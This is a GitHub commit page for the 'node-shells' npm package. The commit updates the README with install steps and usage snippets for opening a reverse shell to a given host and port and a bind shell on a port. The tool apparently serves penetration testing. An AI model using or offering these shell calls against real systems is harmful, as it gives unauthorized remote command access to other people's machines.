Skip to content

Commit

Permalink
update readme with usage
Browse files Browse the repository at this point in the history
  • Loading branch information
Adam Baldwin committed Aug 9, 2013
1 parent 95255f3 commit 1ce19cd
Showing 1 changed file with 21 additions and 3 deletions.
24 changes: 21 additions & 3 deletions README.md
@@ -1,4 +1,22 @@
node-shells
===========
# node-shells

Currently a very simple bind and reverse shell that can be used with node.js. Tested on node 0.4.12
Currently a very simple bind and reverse shell that can be used with node.js. Tested on node 0.10.15

## Install
```
npm install node-shells
```

## Usage: Reverse Shell
```
var shells = require('node-shells');
shells.reverseShell('127.0.0.1', '1234'); // host, port
```


## Usage: Bind Shell
```
var shells = require('node-shells');
shells.bindShell('1234'); // port
```

0 comments on commit 1ce19cd

Please sign in to comment.